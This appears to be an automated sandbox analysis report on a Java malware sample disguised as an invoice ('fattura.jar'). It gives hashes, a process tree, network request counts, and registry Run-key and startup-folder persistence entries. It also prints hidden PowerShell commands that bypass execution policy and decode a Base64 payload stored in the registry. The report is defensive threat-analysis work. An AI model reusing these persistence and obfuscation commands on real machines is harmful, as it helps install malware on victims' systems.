Analysis
-
max time kernel
149s -
max time network
156s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
29-06-2020 18:10
Static task
static1
Behavioral task
behavioral1
Sample
fattura.jar
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
fattura.jar
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
fattura.jar
-
Size
222KB
-
MD5
9f4c61b914d5174226a6591f9e9a2a48
-
SHA1
558fa0ea8e2ea1c3c6b618789a88081eebeeab4c
-
SHA256
eb76c8ea9c1857530e537b318eeac0781f7bbc68ad9e0152bcb2db5a8af71d97
-
SHA512
f433da3b79fdd9f135094fc546988f81f535793a01b3b73803d7ed5f9b6e6eaacc685ee50e73ff7e3c066deeab7208ff64b55e7a5bc704966f8820b6a8dd81fc
Score
8/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
java.exewscript.execmd.exeWScript.exedescription pid process target process PID 676 wrote to memory of 1036 676 java.exe wscript.exe PID 676 wrote to memory of 1036 676 java.exe wscript.exe PID 676 wrote to memory of 1036 676 java.exe wscript.exe PID 1036 wrote to memory of 1376 1036 wscript.exe powershell.exe PID 1036 wrote to memory of 1376 1036 wscript.exe powershell.exe PID 1036 wrote to memory of 1376 1036 wscript.exe powershell.exe PID 1036 wrote to memory of 1828 1036 wscript.exe WScript.exe PID 1036 wrote to memory of 1828 1036 wscript.exe WScript.exe PID 1036 wrote to memory of 1828 1036 wscript.exe WScript.exe PID 1036 wrote to memory of 1848 1036 wscript.exe cmd.exe PID 1036 wrote to memory of 1848 1036 wscript.exe cmd.exe PID 1036 wrote to memory of 1848 1036 wscript.exe cmd.exe PID 1848 wrote to memory of 1892 1848 cmd.exe javaw.exe PID 1848 wrote to memory of 1892 1848 cmd.exe javaw.exe PID 1848 wrote to memory of 1892 1848 cmd.exe javaw.exe PID 1036 wrote to memory of 468 1036 wscript.exe javaw.exe PID 1036 wrote to memory of 468 1036 wscript.exe javaw.exe PID 1036 wrote to memory of 468 1036 wscript.exe javaw.exe PID 1828 wrote to memory of 1580 1828 WScript.exe powershell.exe PID 1828 wrote to memory of 1580 1828 WScript.exe powershell.exe PID 1828 wrote to memory of 1580 1828 WScript.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1376 powershell.exe Token: SeDebugPrivilege 1580 powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 1376 powershell.exe 1376 powershell.exe 1580 powershell.exe 1580 powershell.exe -
Blacklisted process makes network request 25 IoCs
Processes:
WScript.exeflow pid process 4 1828 WScript.exe 5 1828 WScript.exe 8 1828 WScript.exe 10 1828 WScript.exe 11 1828 WScript.exe 12 1828 WScript.exe 14 1828 WScript.exe 15 1828 WScript.exe 16 1828 WScript.exe 18 1828 WScript.exe 19 1828 WScript.exe 20 1828 WScript.exe 22 1828 WScript.exe 23 1828 WScript.exe 24 1828 WScript.exe 26 1828 WScript.exe 27 1828 WScript.exe 28 1828 WScript.exe 30 1828 WScript.exe 31 1828 WScript.exe 32 1828 WScript.exe 34 1828 WScript.exe 35 1828 WScript.exe 36 1828 WScript.exe 38 1828 WScript.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
javaw.exepid process 468 javaw.exe -
Adds Run entry to start application 2 TTPs 6 IoCs
Processes:
WScript.exewscript.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\Run\tDHMhQUaqL = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\tDHMhQUaqL.vbs\"" WScript.exe Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tDHMhQUaqL = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\tDHMhQUaqL.vbs\"" WScript.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\Run wscript.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr = "\"C:\\Program Files\\Java\\jre7\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\AppData\\Roaming\\ntfsmgr.jar\"" wscript.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\software\microsoft\windows\currentversion\run WScript.exe -
Drops startup file 2 IoCs
Processes:
WScript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tDHMhQUaqL.vbs WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tDHMhQUaqL.vbs WScript.exe
Processes
-
C:\Windows\system32\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\fattura.jar1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wscript.exewscript C:\Users\Admin\bjzxzjbyqj.vbs2⤵
- Suspicious use of WriteProcessMemory
- Adds Run entry to start application
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$humanRights = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$humanRights=$humanRights.replace('!&','m');$Abt = [Convert]::FromBase64String($humanRights);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\tDHMhQUaqL.vbs"3⤵
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Adds Run entry to start application
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$humanRights = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$humanRights=$humanRights.replace('!&','A');$Abt = [Convert]::FromBase64String($humanRights);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Program Files\Java\jre7\bin\javaw.exe" -version 2> C:\Users\Admin\AppData\Local\Temp\output.txt3⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Java\jre7\bin\javaw.exe"C:\Program Files\Java\jre7\bin\javaw.exe" -version4⤵
-
C:\Program Files\Java\jre7\bin\javaw.exe"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\ntfsmgr.jar"3⤵
- Suspicious behavior: GetForegroundWindowSpam
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
-
C:\Users\Admin\AppData\Local\Temp\output.txt
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
-
C:\Users\Admin\AppData\Roaming\ntfsmgr.jar
-
C:\Users\Admin\AppData\Roaming\tDHMhQUaqL.vbs
-
C:\Users\Admin\bjzxzjbyqj.vbs
-
memory/468-10-0x0000000000000000-mapping.dmp
-
memory/1036-1-0x0000000000000000-mapping.dmp
-
memory/1036-13-0x0000000002660000-0x0000000002664000-memory.dmpFilesize
16KB
-
memory/1376-3-0x0000000000000000-mapping.dmp
-
memory/1580-14-0x0000000000000000-mapping.dmp
-
memory/1828-4-0x0000000000000000-mapping.dmp
-
memory/1848-6-0x0000000000000000-mapping.dmp
-
memory/1892-7-0x0000000000000000-mapping.dmp